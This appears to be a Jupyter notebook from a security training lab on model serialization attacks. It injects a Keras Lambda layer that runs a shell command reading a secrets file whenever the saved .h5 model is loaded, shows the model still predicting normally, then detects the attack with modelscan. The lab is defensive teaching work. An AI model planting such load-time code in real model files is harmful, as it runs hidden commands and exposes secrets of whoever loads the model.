# Setup

In [1]:
# !pip install -q modelscan
# !modelscan -v

In [1]:
import numpy as np
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
tf.config.set_visible_devices([], 'GPU')
from keras.preprocessing import image
from keras.applications import inception_v3
from keras.applications.inception_v3 import preprocess_input, decode_predictions
from keras import backend as K
from PIL import Image
import os
import sys
safe_model_path = 'very_safe_inception_model.h5'


2025-06-08 12:08:48.360807: I tensorflow/tsl/cuda/cudart_stub.cc:28] Could not find cuda drivers on your machine, GPU will not be used.
2025-06-08 12:08:48.410529: I tensorflow/tsl/cuda/cudart_stub.cc:28] Could not find cuda drivers on your machine, GPU will not be used.
2025-06-08 12:08:48.411756: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
2025-06-08 12:08:49.143256: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT


### Save the safe model 

In [2]:
model = inception_v3.InceptionV3()
model.save(safe_model_path)

Instructions for updating:
Colocations handled automatically by placer.


2025-06-08 12:08:55.708097: I tensorflow/compiler/mlir/mlir_graph_optimization_pass.cc:375] MLIR V1 optimization pass is not enabled
2025-06-08 12:08:56.185009: W tensorflow/c/c_api.cc:304] Operation '{name:'batch_normalization_54/moving_variance/Assign' id:3240 op device:{requested: '', assigned: ''} def:{{{node batch_normalization_54/moving_variance/Assign}} = AssignVariableOp[_has_manual_control_dependencies=true, dtype=DT_FLOAT, validate_shape=false](batch_normalization_54/moving_variance, batch_normalization_54/moving_variance/Initializer/ones)}}' was changed by setting attribute after it was run by a session. This mutation will have no effect, and will trigger an error in the future. Either don't modify nodes after running them or create a new session.
/home/ubuntu/setup/ai-sec-env/lib/python3.8/site-packages/keras/src/engine/training.py:3000: UserWarning: You are saving your model as an HDF5 file via `model.save()`. This file format is considered legacy. We recommend using inste

# Safe Model Prediction

In [3]:
def predict_img(img_path):
    img = image.load_img(img_path, target_size=(299, 299))
    original_image = image.img_to_array(img)
    original_image /= 255.
    original_image -= 0.5
    original_image *= 2.
    x = np.expand_dims(original_image, axis=0)
    pred = model.predict(x)
    print('\033[92m'+str(decode_predictions(pred, top=3))+'\033[0m')

predict_img('./elephant.jpg')

/home/ubuntu/setup/ai-sec-env/lib/python3.8/site-packages/keras/src/engine/training_v1.py:2359: UserWarning: `Model.state_updates` will be removed in a future version. This property should not be used in TensorFlow 2.0, as `updates` are applied automatically.
  updates=self.state_updates,
2025-06-08 12:09:20.880315: W tensorflow/c/c_api.cc:304] Operation '{name:'predictions/Softmax' id:5621 op device:{requested: '', assigned: ''} def:{{{node predictions/Softmax}} = Softmax[T=DT_FLOAT, _has_manual_control_dependencies=true](predictions/BiasAdd)}}' was changed by setting attribute after it was run by a session. This mutation will have no effect, and will trigger an error in the future. Either don't modify nodes after running them or create a new session.


[[('n02504013', 'Indian_elephant', 0.93879485), ('n01871265', 'tusker', 0.019437166), ('n01704323', 'triceratops', 0.010561407)]]


# Scan the Safe Model


The scan results include information on the files scanned, and any issues if found. For the safe model scanned, modelscan finds no model serialization attacks, as expected.

In [4]:
!~/setup/ai-sec-env/bin/modelscan -p ./very_safe_inception_model.h5

2025-06-08 12:09:22.626094: I tensorflow/tsl/cuda/cudart_stub.cc:28] Could not find cuda drivers on your machine, GPU will not be used.
2025-06-08 12:09:22.674553: I tensorflow/tsl/cuda/cudart_stub.cc:28] Could not find cuda drivers on your machine, GPU will not be used.
2025-06-08 12:09:22.675003: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
2025-06-08 12:09:23.426731: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
No settings file detected at /home/ubuntu/dev/terminating-the-terminator-dev/12-serialization-attacks/modelscan-settings.toml. Using defaults. 

Scanning /home/ubuntu/dev/terminating-the-terminator-dev/12-serialization-attacks/very_safe_inception_model.h5 using modelscan.scanners.H5LambdaDet

# Model Serialization Attack

Here malicious code is injected in the safe model to read aws secret keys using Keras' lambda layer. The unsafe model is saved at `./KerasModels/unsafe_model.h5`

In [5]:
safe_model_path = 'very_safe_inception_model.h5'
safe_model_loaded = tf.keras.models.load_model(safe_model_path)

attack = (    
    lambda x: os.system(
        """cat ./secrets.txt"""
    )
    or x
)

lambda_layer = tf.keras.layers.Lambda(attack)(safe_model_loaded.outputs[-1])
unsafe_model = tf.keras.Model(inputs=safe_model_loaded.inputs, outputs=lambda_layer)



2025-06-08 12:09:35.830632: W tensorflow/c/c_api.cc:304] Operation '{name:'conv2d_37_1/kernel/Assign' id:9185 op device:{requested: '', assigned: ''} def:{{{node conv2d_37_1/kernel/Assign}} = AssignVariableOp[_has_manual_control_dependencies=true, dtype=DT_FLOAT, validate_shape=false](conv2d_37_1/kernel, conv2d_37_1/kernel/Initializer/stateless_random_uniform)}}' was changed by setting attribute after it was run by a session. This mutation will have no effect, and will trigger an error in the future. Either don't modify nodes after running them or create a new session.


{"very_very_secret_API_KEY": "bNEIlmhUtxJxwiYjs7ogr5N811psz7" }

In [6]:
# Save the unsafe model
unsafe_model_path = os.path.join("./unsafe_model.h5")
unsafe_model.save(unsafe_model_path)

# Unsafe Model Prediction

The malicious code injected in the unsafe model gets executed when it is loaded. The aws secret keys are displayed. 

Also, the unsafe model predicts the clothing items just as well as safe model i.e., the code injection attack will not impact the model performance. The unaffected performance of unsafe models makes the ML models an effective attack vector. 

In [7]:
unsafe_model_loaded = tf.keras.models.load_model(unsafe_model_path)

predict_img('./elephant.jpg')

{"very_very_secret_API_KEY": "bNEIlmhUtxJxwiYjs7ogr5N811psz7" }

2025-06-08 12:10:33.701430: W tensorflow/c/c_api.cc:304] Operation '{name:'batch_normalization_70_2/beta/Assign' id:18578 op device:{requested: '', assigned: ''} def:{{{node batch_normalization_70_2/beta/Assign}} = AssignVariableOp[_has_manual_control_dependencies=true, dtype=DT_FLOAT, validate_shape=false](batch_normalization_70_2/beta, batch_normalization_70_2/beta/Initializer/zeros)}}' was changed by setting attribute after it was run by a session. This mutation will have no effect, and will trigger an error in the future. Either don't modify nodes after running them or create a new session.


[[('n02504013', 'Indian_elephant', 0.93879485), ('n01871265', 'tusker', 0.019437166), ('n01704323', 'triceratops', 0.010561407)]]


# Scan the Unsafe Model

The scan results include information on the files scanned, and any issues if found. In this case, a critical severity level issue is found in the unsafe model scanned. 

modelscan also outlines the found operator(s) and module(s) deemed unsafe. 

In [8]:
!~/setup/ai-sec-env/bin/modelscan -p ./unsafe_model.h5

2025-06-08 12:10:37.298974: I tensorflow/tsl/cuda/cudart_stub.cc:28] Could not find cuda drivers on your machine, GPU will not be used.
2025-06-08 12:10:37.347884: I tensorflow/tsl/cuda/cudart_stub.cc:28] Could not find cuda drivers on your machine, GPU will not be used.
2025-06-08 12:10:37.348386: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
2025-06-08 12:10:38.103483: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
No settings file detected at /home/ubuntu/dev/terminating-the-terminator-dev/12-serialization-attacks/modelscan-settings.toml. Using defaults. 

Scanning /home/ubuntu/dev/terminating-the-terminator-dev/12-serialization-attacks/unsafe_model.h5 using modelscan.scanners.H5LambdaDetectScan model

# Reporting Format
ModelScan can report scan results in console (default), JSON, or custom report (to be defined by user in settings-file). For mode details, please see:  ` modelscan -h` 

## JSON Report

For JSON reporting: `modelscan -p ./path-to/file -r json -o output-file-name.json` 


In [9]:
# This will save the scan results in file: keras-model-scan-results.json
!~/setup/ai-sec-env/bin/modelscan --path  ./unsafe_model.h5 -r json -o keras-model-scan-results.json

2025-06-08 12:10:39.885425: I tensorflow/tsl/cuda/cudart_stub.cc:28] Could not find cuda drivers on your machine, GPU will not be used.
2025-06-08 12:10:39.933589: I tensorflow/tsl/cuda/cudart_stub.cc:28] Could not find cuda drivers on your machine, GPU will not be used.
2025-06-08 12:10:39.934052: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
2025-06-08 12:10:40.690438: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
No settings file detected at /home/ubuntu/dev/terminating-the-terminator-dev/12-serialization-attacks/modelscan-settings.toml. Using defaults. 

Scanning /home/ubuntu/dev/terminating-the-terminator-dev/12-serialization-attacks/unsafe_model.h5 using modelscan.scanners.H5LambdaDetectScan model